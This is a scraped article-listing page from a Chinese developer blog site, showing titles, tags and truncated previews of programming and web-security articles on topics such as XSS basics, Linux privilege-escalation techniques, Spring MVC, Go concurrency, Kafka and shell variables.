<a class="tag" taget="_blank" href="/search/web%E6%BC%8F%E6%B4%9E/1.htm">web漏洞</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>文章目录前言1.前端知识2.什么是XSS3.漏洞挖掘4.参考前言之前对XSS的理解就是停留在弹窗，认为XSS这种漏洞真的是漏洞吗？安全学习了蛮久了，也应该对XSS有更进一步的认识了。1.前端知识现代浏览器是一个高度复杂的软件系统，由多个核心组件协同工作，旨在高效、安全地呈现网页内容并执行交互逻辑。对一般用户来讲，其主要功能就是向服务器发出请求，在窗口中展示用户所选择的网络资源。这里所说的资源一般是</div>
                    </li>
                    <li><a href="/article/1899329200700059648.htm"
                           title="springMVC RestFul接口设计模式详解，包括前后端设计详解。@GetMapping、@PostMapping、@PutMapping@DeleteMapping@PathVariable" target="_blank">springMVC RestFul接口设计模式详解，包括前后端设计详解。@GetMapping、@PostMapping、@PutMapping@DeleteMapping@PathVariable</a>
                        <span class="text-muted">漫慢丶</span>
<a class="tag" taget="_blank" href="/search/springmvc/1.htm">springmvc</a><a class="tag" taget="_blank" href="/search/restful/1.htm">restful</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>目录1、什么是RestFul接口设计模式2、使用该接口设计模式后端还需要配置什么3、使用该接口设计模式前端需要注意什么4、Controller具体实现方式1、什么是RestFul接口设计模式RestFul这是一种springmvc接口的设计模式，用来区别不同类型的请求，来匹配控制器处理映射。例如请求URL为/test/那么中根据Get、put、post等请求方式，就可以具体映射到对应的控制器方法。</div>
                    </li>
                    <li><a href="/article/1899328948156821504.htm"
                           title="批量共享，一步到位的软件神器" target="_blank">批量共享，一步到位的软件神器</a>
                        <span class="text-muted">维度哥</span>
<a class="tag" taget="_blank" href="/search/%E6%89%B9%E9%87%8F%E5%85%B1%E4%BA%AB/1.htm">批量共享</a>
                        <div>今天介绍一个可以一键共享文件夹的软件神器，更厉害的是可以批量设置共享并编辑共享和安全权限。批量共享一键批量共享文件夹这个软件下载之后打开就能直接使用，不需要安装。选择好文件之后设置访问权限以及共享权限，就可以直接共享给别人了。可以根据需求自己增删系统用户。也可以选择指定的用户进行共享。这里可以方便你更好的查看、管理共享用户和对应的权限。在共享设置里，如果不清楚怎么设置，可以全选设置即可。如果还有一</div>
                    </li>
                    <li><a href="/article/1899328316687577088.htm"
                           title="学习笔记10——并发编程2线程安全问题与同步机制" target="_blank">学习笔记10——并发编程2线程安全问题与同步机制</a>
                        <span class="text-muted">码代码的小仙女</span>
<a class="tag" taget="_blank" href="/search/%E9%AB%98%E7%BA%A7%E5%BC%80%E5%8F%91%E5%BF%85%E5%A4%87%E6%8A%80%E8%83%BD/1.htm">高级开发必备技能</a><a class="tag" taget="_blank" href="/search/java%E7%9F%A5%E8%AF%86/1.htm">java知识</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>线程安全问题与同步机制线程安全的本质问题线程安全问题源于多线程环境下对共享资源（数据或状态）的非原子性、非可见性、非有序性访问，导致程序行为不符合预期。主要表现如下：竞态条件（RaceCondition）：多个线程对同一资源进行非原子操作，导致结果依赖线程执行顺序。示例：两个线程同时执行count++（非原子操作，实际包含读-改-写三步）。内存可见性问题：线程修改共享变量后，其他线程无法立即看到最</div>
                    </li>
                    <li><a href="/article/1899324281767129088.htm"
                           title="关于tomcat" target="_blank">关于tomcat</a>
                        <span class="text-muted">gloria123_</span>
<a class="tag" taget="_blank" href="/search/tomcat/1.htm">tomcat</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>**web应用服务器安装在服务端的服务产品，在web服务器上放置一些允许客户端直接访问的资源，启动服务，客户端通过ip+端口号即可以访问web应用服务器上的资源下载tomcat压缩包并解压后：tomcat:bin目录:存放启动和停止服务等的脚本mac电脑通过命令sudoshstartup.sh来启动，windows系统通过bat可以手动启动conf目录：存放tomcat服务器配置文件web.xml</div>
                    </li>
                    <li><a href="/article/1899323397242941440.htm"
                           title="12.1go语言sync.Map和atomic包" target="_blank">12.1go语言sync.Map和atomic包</a>
                        <span class="text-muted">chxii</span>
<a class="tag" taget="_blank" href="/search/go%E8%AF%AD%E8%A8%80/1.htm">go语言</a><a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/go/1.htm">go</a><a class="tag" taget="_blank" href="/search/%E5%9F%BA%E7%A1%80/1.htm">基础</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/golang/1.htm">golang</a>
                        <div>sync.Map在Go语言中，sync.Map是sync包提供的一个并发安全的映射（map）类型。与内置的map类型不同，sync.Map无需在外部加锁即可安全地在多个goroutine中进行读写操作。这使得sync.Map在某些特定场景下，如高并发读写、键值对频繁变动等，具有更好的性能表现。1.特点并发安全：sync.Map内部实现了同步机制，多个goroutine可以同时对其进行读写操作，而无</div>
                    </li>
                    <li><a href="/article/1899317217368010752.htm"
                           title="Linux 提权" target="_blank">Linux 提权</a>
                        <span class="text-muted">藤原千花的败北</span>
<a class="tag" taget="_blank" href="/search/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/1.htm">权限提升</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/%E8%BF%90%E7%BB%B4/1.htm">运维</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>文章目录前言1.内核漏洞提权脏牛（CVE-2016-5195）2.不安全的系统配置项2.1SUID/SGID提权2.2sudo提权2.3定时任务提权2.4capabilities提权3.第三方软件提权TomcatmanagerNginx本地提权（CVE-2016-1247）Redis未授权4.参考前言Linux提权总结1.内核漏洞提权内核管理着组件（如系统上的内存）和应用程序之间的通信。这个关键作</div>
                    </li>
                    <li><a href="/article/1899317091039768576.htm"
                           title="【推荐项目】 043-停车管理系统" target="_blank">【推荐项目】 043-停车管理系统</a>
                        <span class="text-muted">蜗牛 | ICU</span>
<a class="tag" taget="_blank" href="/search/%E6%8E%A8%E8%8D%90%E9%A1%B9%E7%9B%AE/1.htm">推荐项目</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E6%A1%86%E6%9E%B6/1.htm">前端框架</a>
                        <div>043-停车管理系统介绍使用springbootvuejsmysql技术搭建框架。智能停车管理系统描述后端框架：采用SpringBoot与MySQL的强强联合，为系统提供稳健、高效的服务支撑。前端框架：前端选用Vue.js，打造流畅、美观的用户交互界面。管理员功能：用户信息管理：轻松管理用户信息，包括新增、编辑、删除及查询用户。界面清晰，操作便捷，确保用户数据的安全与准确。车位信息管理：实时查看车</div>
                    </li>
                    <li><a href="/article/1899313815368036352.htm"
                           title="QT显示网页控件QAxWidget、QWebEngineView及区别" target="_blank">QT显示网页控件QAxWidget、QWebEngineView及区别</a>
                        <span class="text-muted">AI+程序员在路上</span>
<a class="tag" taget="_blank" href="/search/QT%26amp%3BC%2B%2B%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97/1.htm">QT&amp;C++实战系列</a><a class="tag" taget="_blank" href="/search/qt/1.htm">qt</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>一.QT种显示网页控件QAxWidget1.介绍QAxWidget属于QtAxContainer模块，ActiveX是微软提出的一种组件对象模型（COM）技术，允许不同的软件组件在Windows操作系统上进行交互和集成。QAxWidget为开发者提供了在Qt应用程序中使用ActiveX控件的能力，通过它可以将各种ActiveX控件嵌入到应用程序界面中。2.使用引入必要的模块在.pro文件中添加QT</div>
                    </li>
                    <li><a href="/article/1899301955566628864.htm"
                           title="Garfish 源码解析 —— 一个微应用是如何被挂载的" target="_blank">Garfish 源码解析 —— 一个微应用是如何被挂载的</a>
                        <span class="text-muted">moonrailgun</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E7%A8%8B%E5%8C%96/1.htm">工程化</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E6%A1%86%E6%9E%B6/1.htm">前端框架</a>
                        <div>背景Garfish是字节跳动webinfra团队推出的一款微前端框架包含构建微前端系统时所需要的基本能力，任意前端框架均可使用。接入简单，可轻松将多个前端应用组合成内聚的单个产品因为当前对Garfish的解读极少，而微前端又是现代前端领域相当重要的一环，因此写下本文，同时也是对学习源码的一个总结本文基于garfish#0d4cc0c82269bce8422b0e9105b7fe88c2efe42a</div>
                    </li>
                    <li><a href="/article/1899301829213220864.htm"
                           title="Vue3 基础教程：从入门到实践 (保姆级教学)" target="_blank">Vue3 基础教程：从入门到实践 (保姆级教学)</a>
                        <span class="text-muted">前段技术人</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/vue/1.htm">vue</a>
                        <div>一、Vue3简介Vue.js是一款用于构建用户界面的JavaScript框架，而Vue3作为其最新的主要版本，带来了诸多令人瞩目的改进与新特性，使其在前端开发领域备受青睐。（一）Vue3的优势性能提升：Vue3重写了虚拟DOM算法，显著提高了挂载、更新和渲染的速度。在处理大型列表或频繁数据更新的场景时，Vue3的表现更为出色，能够为用户带来更流畅的交互体验。例如，一个包含大量商品信息的电商产品列表</div>
                    </li>
                    <li><a href="/article/1899300819287732224.htm"
                           title="javaweb内置对象request,response,out,session,Application等" target="_blank">javaweb内置对象request,response,out,session,Application等</a>
                        <span class="text-muted">菜鸟小T</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/http/1.htm">http</a><a class="tag" taget="_blank" href="/search/struts/1.htm">struts</a>
                        <div>JSP内置对象是一些不用声明，也不用像一般的java代码一样需要用new去获取实例的对象，这些对象可以直接在JSP页面的脚本部分使用。一、request对象：1.response和request对象是JSP的内置对象中比较重要的两个，这两个对象提供了对服务器和浏览器通信方法的控制，在JSP中，内置对象request封装了用户提交的信息，即使用HTTP协议处理客户请求时，表单提交的数据就存放在req</div>
                    </li>
                    <li><a href="/article/1899300696155549696.htm"
                           title="使用Java对接StockTV印度股票数据源API实战指南" target="_blank">使用Java对接StockTV印度股票数据源API实战指南</a>
                        <span class="text-muted"></span>
<a class="tag" taget="_blank" href="/search/java%E7%88%AC%E8%99%AB/1.htm">java爬虫</a>
                        <div>关键词：JavaAPI开发、SpringBoot、WebSocket、ApacheHttpClient一、项目概述本指南将使用Java实现StockTV金融数据API的完整对接方案，包含以下核心模块：✅RESTAPI客户端：支持同步/异步调用✅WebSocket实时订阅：基于SpringWebSocket✅企业级特性：连接池管理、熔断降级✅生产就绪：完整的异常处理和监控二、环境准备1.技术栈要求J</div>
                    </li>
                    <li><a href="/article/1899300566526390272.htm"
                           title="SpringBoot + vue 管理系统" target="_blank">SpringBoot + vue 管理系统</a>
                        <span class="text-muted">m0_51274464</span>
<a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF/1.htm">学习路线</a><a class="tag" taget="_blank" href="/search/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4/1.htm">阿里巴巴</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>SpringBoot+vue管理系统文章目录SpringBoot+vue管理系统1、成品效果展示2、项目准备3、项目开发3.1、部门管理3.1.1、前端核心代码3.1.2、后端代码实现3.2、员工管理3.2.1、前端核心代码3.2.2、后端代码实现3.3、班级管理3.3.1、前端核心代码3.3.2、后端代码实现3.4、学生管理3.4.1、前端核心代码3.4.2、后端代码实现3.5、数据统计3.5.</div>
                    </li>
                    <li><a href="/article/1899299809274163200.htm"
                           title="web前端高级JavaScript - 闭包的应用及循环事件绑定的N中解决办法" target="_blank">web前端高级JavaScript - 闭包的应用及循环事件绑定的N中解决办法</a>
                        <span class="text-muted">一笑程序猴</span>
<a class="tag" taget="_blank" href="/search/WEB%E5%89%8D%E7%AB%AF%E9%AB%98%E7%BA%A7%E6%95%99%E7%A8%8B/1.htm">WEB前端高级教程</a><a class="tag" taget="_blank" href="/search/%E9%97%AD%E5%8C%85%E5%BA%94%E7%94%A8/1.htm">闭包应用</a><a class="tag" taget="_blank" href="/search/%E5%BE%AA%E7%8E%AF%E4%BA%8B%E4%BB%B6%E7%BB%91%E5%AE%9A/1.htm">循环事件绑定</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E5%AE%9A%E4%B9%89%E7%B4%A2%E5%BC%95/1.htm">自定义索引</a>
                        <div>闭包在循环事件绑定中的应用场景描述：在页面上有3个button按钮，当点击每个按钮时输出当前按钮的索引值，要求用循环来绑定每个按钮的事件，看下面的代码。button1button2button3varbuttons=document.querySelectorAll('button');for(vari=0;i<buttons.length;i++){buttons[i].onclick=func</div>
                    </li>
                    <li><a href="/article/1899298421395746816.htm"
                           title="实施疫苗冷链温度监控预警 保障疫苗安全" target="_blank">实施疫苗冷链温度监控预警 保障疫苗安全</a>
                        <span class="text-muted">BEOL贝尔科技</span>
<a class="tag" taget="_blank" href="/search/%E5%85%B6%E4%BB%96/1.htm">其他</a>
                        <div>国家免疫规划工作已经实施多年，接种疫苗是预防疾病最直接、最经济、最有效的手段。新冠疫苗第三针已经开始接种，但是近年来不断发生的疫苗事件，让广大市民对疫苗的质量安全产生了质疑。为了保障疫苗质量安全，小编推荐使用疫苗冷链温湿度监控预警系统。该系统能对储存疫苗的冰箱温度进行实时采集并上传到网络平台，相关人员可通过登陆平台查看设备内温度。一旦冷链设备运行出现异常情况，如发生温度超限或停电，系统会及时报警，</div>
                    </li>
                    <li><a href="/article/1899295649019523072.htm"
                           title="历史文章汇总" target="_blank">历史文章汇总</a>
                        <span class="text-muted">Nuan_Feng</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>仿照实现项目Nettygit地址VPNgit地址TCP、HTTP、WebSocket、SOCKS5、DNS协议实现git地址实现DNS协议java版java实现socks5Txlcn手写分布式id生成器git地址手写分布式id生成器手写可视化逆向工程git地址手写可视化逆向工程源码解析1.xxljob，阅读3.2w收藏318点赞数124xxljob源码解析2.netty源码解析netty源码解析一</div>
                    </li>
                    <li><a href="/article/1899294639756734464.htm"
                           title="【 ＜一＞ 炼丹初探：JavaWeb 的起源与基础】之 JavaWeb 项目的部署：从开发环境到生产环境" target="_blank">【 ＜一＞ 炼丹初探：JavaWeb 的起源与基础】之 JavaWeb 项目的部署：从开发环境到生产环境</a>
                        <span class="text-muted">Foyo Designer</span>
<a class="tag" taget="_blank" href="/search/firefox/1.htm">firefox</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E6%94%B9%E8%A1%8C%E5%AD%A6it/1.htm">改行学it</a><a class="tag" taget="_blank" href="/search/%E7%BB%8F%E9%AA%8C%E5%88%86%E4%BA%AB/1.htm">经验分享</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E6%96%B9%E6%B3%95/1.htm">学习方法</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E4%BA%BA%E7%94%9F/1.htm">程序人生</a>
                        <div>点击此处查看合集https://blog.csdn.net/foyodesigner/category_12907601.html?fromshare=blogcolumn&sharetype=blogcolumn&sharerId=12907601&sharerefer=PC&sharesource=FoyoDesigner&sharefrom=from_link一、开发环境：写代码的“温床”在</div>
                    </li>
                                <li><a href="/article/45.htm"
                                       title="安装数据库首次应用" target="_blank">安装数据库首次应用</a>
                                    <span class="text-muted">Array_06</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>可是为什么再一次失败之后就变成直接跳过那个要求 
enter full pathname of java.exe的界面 
 
 
这个java.exe是你的Oracle 11g安装目录中例如：【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe！ 
注意第一次，使用SQL D</div>
                                </li>
                                <li><a href="/article/172.htm"
                                       title="Weblogic Server Console密码修改和遗忘解决方法" target="_blank">Weblogic Server Console密码修改和遗忘解决方法</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/Welogic/1.htm">Welogic</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在工作中一同事将Weblogic的console的密码忘记了，通过网上查询资料解决，实践整理了一下。 
一.修改Console密码 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 打开weblogic控制台，安全领域&nbsp;--&gt; myrealm --&gt;&n</div>
                                </li>
                                <li><a href="/article/299.htm"
                                       title="IllegalStateException: Cannot forward a response that is already committed" target="_blank">IllegalStateException: Cannot forward a response that is already committed</a>
                                    <span class="text-muted">Cwind</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Servlets/1.htm">Servlets</a>
                                    <div>对于初学者来说，一个常见的误解是：当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。   示例代码：   
protected void doPost() {
    if (someCondition) {
        sendRedirect();
    }
    forward(); // Thi</div>
                                </li>
                                <li><a href="/article/426.htm"
                                       title="基于流的装饰设计模式" target="_blank">基于流的装饰设计模式</a>
                                    <span class="text-muted">木zi_鸣</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>当想要对已有类的对象进行功能增强时，可以定义一个类，将已有对象传入，基于已有的功能，并提供加强功能。 
自定义的类成为装饰类 
 
模仿BufferedReader，对Reader进行包装，体现装饰设计模式 
 
装饰类通常会通过构造方法接受被装饰的对象，并基于被装饰的对象功能，提供更强的功能。 
装饰模式比继承灵活，避免继承臃肿，降低了类与类之间的关系 
 
装饰类因为增强已有对象，具备的功能该</div>
                                </li>
                                <li><a href="/article/553.htm"
                                       title="Linux中的uniq命令" target="_blank">Linux中的uniq命令</a>
                                    <span class="text-muted">被触发</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>Linux命令uniq的作用是过滤重复部分显示文件内容，这个命令读取输入文件，并比较相邻的行。在正常情 况下，第二个及以后更多个重复行将被删去，行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示，则从标准输入读取。 
AD： 
uniq [选项] 文件 
说明：这个命令读取输入文件，并比较相邻的行。在正常情况下，第二个</div>
                                </li>
                                <li><a href="/article/680.htm"
                                       title="正则表达式Pattern" target="_blank">正则表达式Pattern</a>
                                    <span class="text-muted">肆无忌惮_</span>
<a class="tag" taget="_blank" href="/search/Pattern/1.htm">Pattern</a>
                                    <div>正则表达式是符合一定规则的表达式，用来专门操作字符串，对字符创进行匹配，切割，替换，获取。 
&nbsp; 
例如，我们需要对QQ号码格式进行检验 
规则是长度6~12位 &nbsp;不能0开头 &nbsp;只能是数字，我们可以一位一位进行比较，利用parseLong进行判断，或者是用正则表达式来匹配[1-9][0-9]{4,14}&nbsp;或者&nbsp;[1-9]\d{4,14} 
&nbs</div>
                                </li>
                                <li><a href="/article/807.htm"
                                       title="Oracle高级查询之OVER (PARTITION BY ..)" target="_blank">Oracle高级查询之OVER (PARTITION BY ..)</a>
                                    <span class="text-muted">知了ing</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>一、rank()/dense_rank() over(partition by ...order by ...) 
 
现在客户有这样一个需求，查询每个部门工资最高的雇员的信息，相信有一定oracle应用知识的同学都能写出下面的SQL语句： 
 
 select e.ename, e.job, e.sal, e.deptno  
  from scott.emp e,  
       (se</div>
                                </li>
                                <li><a href="/article/934.htm"
                                       title="Python调试" target="_blank">Python调试</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/pdb/1.htm">pdb</a>
                                    <div>原文地址： 
http://blog.csdn.net/xuyuefei1988/article/details/19399137 
1、下面网上收罗的资料初学者应该够用了，但对比IBM的Python 代码调试技巧： 
 
IBM：包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试： 
 
http://www.ibm.com/d</div>
                                </li>
                                <li><a href="/article/1061.htm"
                                       title="webservice传递自定义对象时函数为空，以及boolean不对应的问题" target="_blank">webservice传递自定义对象时函数为空，以及boolean不对应的问题</a>
                                    <span class="text-muted">alleni123</span>
<a class="tag" taget="_blank" href="/search/webservice/1.htm">webservice</a>
                                    <div>今天在客户端调用方法 
NodeStatus status=iservice.getNodeStatus(). 
 
结果NodeStatus的属性都是null。 
 
进行debug之后，发现服务器端返回的确实是有值的对象。 
 
后来发现原来是因为在客户端，NodeStatus的setter全部被我删除了。 
本来是因为逻辑上不需要在客户端使用setter， 结果改了之后竟然不能获取带属性值的</div>
                                </li>
                                <li><a href="/article/1188.htm"
                                       title="java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针" target="_blank">java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针</a>
                                    <span class="text-muted">百合不是茶</span>

                                    <div>C语言的强大在于可以直接操作指针的地址，通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大，初学者很难掌握， java的出现解决了c，c++中指针的问题 java将指针封装在底层，开发人员是不能够去操作指针的地址，但是可以通过引用来间接的操作： 
&nbsp; 
定义一个指针p来指向a的地址（&amp;是地址符号）： 
&nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/1315.htm"
                                       title="Eclipse打不开，提示“An error has occurred.See the log file ***/.log”" target="_blank">Eclipse打不开，提示“An error has occurred.See the log file ***/.log”</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a>
                                    <div>打开eclipse工作目录的\.metadata\.log文件，发现如下错误： 
 
!ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 
!MESSAGE Application error 
!STACK 1 
java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai</div>
                                </li>
                                <li><a href="/article/1442.htm"
                                       title="spring aop实例annotation方法实现" target="_blank">spring aop实例annotation方法实现</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a><a class="tag" taget="_blank" href="/search/annotation/1.htm">annotation</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在spring aop实例中我们通过配置xml文件来实现AOP，这里学习使用annotation来实现，使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut 
AdviceMethods.jav</div>
                                </li>
                                <li><a href="/article/1569.htm"
                                       title="[Velocity一]Velocity语法基础入门" target="_blank">[Velocity一]Velocity语法基础入门</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/velocity/1.htm">velocity</a>
                                    <div>用户和开发人员参考文档 
http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html 
&nbsp; 注释 
1.行级注释## 
2.多行注释#*&nbsp; *# 
&nbsp; 变量定义 
使用$开头的字符串是变量定义，例如$var1, $var2, 
&nbsp; 赋值 
使用#set为变量赋值，例</div>
                                </li>
                                <li><a href="/article/1696.htm"
                                       title="【Kafka十一】关于Kafka的副本管理" target="_blank">【Kafka十一】关于Kafka的副本管理</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a>
                                    <div>1. 关于request.required.acks 
&nbsp; 
request.required.acks控制者Producer写请求的什么时候可以确认写成功，默认是0， 
0表示即不进行确认即返回。 
1表示Leader写成功即返回，此时还没有进行写数据同步到其它Follower Partition中 
-1表示根据指定的最少Partition确认后才返回，这个在 
&nbsp; 
Th</div>
                                </li>
                                <li><a href="/article/1823.htm"
                                       title="lua统计nginx内部变量数据" target="_blank">lua统计nginx内部变量数据</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/lua+nginx%E3%80%80+%E7%BB%9F%E8%AE%A1/1.htm">lua nginx　 统计</a>
                                    <div>server {
    listen 80;
    server_name photo.domain.com;
    location /{set $str $uri;
        content_by_lua '
            local url = ngx.var.uri
            local res = ngx.location.capture(</div>
                                </li>
                                <li><a href="/article/1950.htm"
                                       title="java-11.二叉树中节点的最大距离" target="_blank">java-11.二叉树中节点的最大距离</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.ArrayList;
import java.util.List;


public class MaxLenInBinTree {

	/*
	 a.			1
	 		   /  \
	 		  2    3
	 		 / \  / \
	 		4   5 6  7
	 	max=4	pass &quot;root&quot;
	 </div>
                                </li>
                                <li><a href="/article/2077.htm"
                                       title="Netty源码学习-ReadTimeoutHandler" target="_blank">Netty源码学习-ReadTimeoutHandler</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div> 
ReadTimeoutHandler的实现思路： 
开启一个定时任务，如果在指定时间内没有接收到消息，则抛出ReadTimeoutException 
这个异常的捕获，在开发中，交给跟在ReadTimeoutHandler后面的ChannelHandler，例如 
 
 

private final ChannelHandler timeoutHandler =
	new ReadTim</div>
                                </li>
                                <li><a href="/article/2204.htm"
                                       title="jquery验证上传文件样式及大小(好用)" target="_blank">jquery验证上传文件样式及大小(好用)</a>
                                    <span class="text-muted">cngolon</span>
<a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.htm">文件上传</a><a class="tag" taget="_blank" href="/search/jquery%E9%AA%8C%E8%AF%81/1.htm">jquery验证</a>
                                    <div>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
    &lt;script src=&quot;jquery1.8/jquery-1.8.0.</div>
                                </li>
                                <li><a href="/article/2331.htm"
                                       title="浏览器兼容【转】" target="_blank">浏览器兼容【转】</a>
                                    <span class="text-muted">cuishikuan</span>
<a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a><a class="tag" taget="_blank" href="/search/IE/1.htm">IE</a>
                                    <div>浏览器兼容问题一：不同浏览器的标签默认的外补丁和内补丁不同 
 
问题症状：随便写几个标签，不加样式控制的情况下，各自的margin 和padding差异较大。 
 
碰到频率:100% 
 
解决方案：CSS里&nbsp;&nbsp;&nbsp; *{margin:0;padding:0;} 
 
备注：这个是最常见的也是最易解决的一个浏览器兼容性问题，几乎所有的CSS文件开头都会用通配符*来设</div>
                                </li>
                                <li><a href="/article/2458.htm"
                                       title="Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数" target="_blank">Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a><a class="tag" taget="_blank" href="/search/%24%23/1.htm">$#</a><a class="tag" taget="_blank" href="/search/%24%3F/1.htm">$?</a><a class="tag" taget="_blank" href="/search/%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F/1.htm">特殊变量</a>
                                    <div>前面已经讲到，变量名只能包含数字、字母和下划线，因为某些包含其他字符的变量有特殊含义，这样的变量被称为特殊变量。例如，$ 表示当前Shell进程的ID，即pid，看下面的代码：   
 
  $echo $$  
   
